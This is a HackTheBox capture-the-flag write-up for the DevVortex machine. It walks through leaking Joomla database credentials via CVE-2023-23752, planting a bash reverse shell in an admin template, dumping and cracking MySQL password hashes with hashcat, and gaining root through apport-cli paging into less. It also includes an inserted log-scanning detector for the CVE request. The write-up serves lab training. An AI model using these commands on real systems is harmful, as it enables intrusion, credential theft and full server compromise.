HackTheBox DevVortex Writeup
Explore the fundamentals of cybersecurity with the DevVortex Capture The Flag (CTF) challenge, an easy-level experience ideal for beginners! This straightforward CTF writeup offers clear insights into key concepts, presented with clarity and simplicity.
Add Hosts
Edit the /etc/hosts file and add the following entries:
10.10.11.242 devvortex.htb dev.devvortex.htb
dev.devvortex.htb was found with a subdomain finder like:
gobuster dns -d "devvortex.htb" -w subdomains-top1million-5000.txt -t "$(nproc)"
This ensures that your system can resolve the domain names devvortex.htb and dev.devvortex.htb to the correct IP address 10.10.11.242.
Script to add hosts automatically
ip="10.10.11.242"
domain="devvortex.htb dev.devvortex.htb"
# Append the entry only if it is not already present in /etc/hosts.
grep -qF "$ip $domain" /etc/hosts || printf '%s\n' "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV devvortex.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DevVortex
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Gather Information From Joomla
Use the following command to query the unauthenticated Joomla API endpoint that leaks the site configuration (CVE-2023-23752, an information disclosure in the Joomla web services API):
curl "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" -s
This command fetches data from the specified URL in silent mode (-s) and displays the output.
Script to parse user and password from the result
# Fetch the leaked configuration once and extract the fields with jq.
RESP=$(curl -s "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true")
USER=$(printf '%s' "$RESP" | jq -r '.data[] | select(.attributes.user) | .attributes.user')
PASSWORD=$(printf '%s' "$RESP" | jq -r '.data[] | select(.attributes.password) | .attributes.password')
DBPREFIX=$(printf '%s' "$RESP" | jq -r '.data[] | select(.attributes.dbprefix) | .attributes.dbprefix')
echo -e "dev.devvortex.htb/administrator webpage credentials:\n usr: $USER\n pass: $PASSWORD\n dbprefix: $DBPREFIX"
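As an added defender-side example (not part of the original writeup), here is a POSIX shell function that scans nginx access-log lines for the request pattern above. The log lines are constructed samples, and the function matches the page's config/application endpoint and, as a generalization, any /api/index.php/v1/ request carrying public=true.

```shell
#!/bin/sh
# Constructed sample nginx access-log lines (combined format); not taken from the box.
SAMPLE_LOG='10.10.14.5 - - [01/Jan/2024:10:00:00 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1523 "-" "curl/7.88.1"
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 912 "-" "curl/7.88.1"
192.168.1.20 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
192.168.1.21 - - [01/Jan/2024:10:00:03 +0000] "GET /administrator/index.php HTTP/1.1" 200 2100 "-" "Mozilla/5.0"'

# Print "client status path" for every unauthenticated Joomla v1 API request
# that carries public=true, the signature of the CVE-2023-23752 disclosure.
# Field layout of the combined log: $1 client IP, $7 request path, $9 status.
detect_joomla_api_leak() {
    printf '%s\n' "$1" | awk '
        $7 ~ /^\/api\/index\.php\/v1\// && $7 ~ /public=true/ {
            print $1, $9, $7
        }'
}

# Number of flagged requests, usable as an alert threshold.
count_joomla_api_leak() {
    detect_joomla_api_leak "$1" | wc -l | tr -d ' '
}

detect_joomla_api_leak "$SAMPLE_LOG"
```

A 200 status on these paths means the server returned the configuration; after patching Joomla (the CVE is fixed in 4.2.8) the same requests should be denied.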
Log in to Joomla Admin Panel
Access the Joomla administrator webpage at:
http://dev.devvortex.htb/administrator
Navigate to System > Administration Templates > index.php and add the following command directly after <?php:
system('/bin/bash -c "bash -i >& /dev/tcp/<vpn-ip>/9001 0>&1"');
Replace <vpn-ip> with your actual VPN IP to receive the connection.
Then, start a listener on port 9001 to catch the reverse shell:
nc -lvnp 9001
Trigger the command execution by visiting the administrator webpage:
curl -s http://dev.devvortex.htb/administrator/index.php
Get an Interactive Shell
Once the reverse shell connects, upgrade it to an interactive TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm
Extract Password Hash From MySQL
Log in to MySQL using the credentials obtained above (the database is named joomla):
mysql -u '<user>' --password='<password>' joomla
Extract the password hash:
show tables;
select * from sd4fg_users;
Brute Force the Hash
Use a hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.
read -r -p "Password hash: " hash
printf '%s\n' "$hash" > /tmp/hash.txt
# -m 3200 selects bcrypt (Joomla stores $2y$ hashes); -a 0 is a wordlist attack
hashcat -m 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 3200 /tmp/hash.txt --show
rm -f /tmp/hash.txt
SSH Login with Discovered Password
Once you find the password, log in via SSH using the discovered credentials:
ssh logan@devvortex.htb
Obtain User Flag
Retrieve the user flag by running the following command:
cat "$HOME/user.txt"
Privilege Escalation
Run sudo -l to list the programs that the current user can run as root.
Execute the following steps for privilege escalation:
- Run the command:
sudo /usr/bin/apport-cli -f
- Send input 1
- Send input 2
- Choose to view the report and wait approximately 10 seconds for it to open in less, then type:
:!/bin/bash
This command uses less to spawn a shell, as described in GTFOBins. It works because apport-cli pages the report through less, and since apport-cli is executed as root via sudo, the spawned shell is also root.
Obtain Root Flag
cat /root/root.txt